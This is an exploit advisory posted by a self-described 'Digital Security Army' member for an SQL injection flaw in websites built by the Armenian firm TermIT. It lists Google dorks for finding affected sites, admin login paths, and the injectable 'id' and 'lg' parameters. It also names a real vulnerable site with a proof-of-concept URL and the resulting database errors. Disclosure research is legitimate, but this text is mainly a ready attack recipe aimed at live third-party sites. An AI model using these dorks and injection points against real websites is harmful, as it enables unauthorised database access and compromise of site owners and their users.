#################################################################################################
# Exploit Title : Termit.Am Armenia Hosting Պատրաստեց TermIT ընկերությունը SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : termit.am
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Պատրաստեց TermIT ընկերությունը'' site:am
intext: © 2011 Developed by TermIT site:am
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
/admin/admin.php
/login
# SQL Injection Exploit :
/index.php?id=[ID-NUMBER]&lg=[SQL Injection]
/index.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
hinstitute.am/index.php?id=51%27 => [ Proof of Concept ] => archive.is/kJf08
# SQL Database Error =>
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################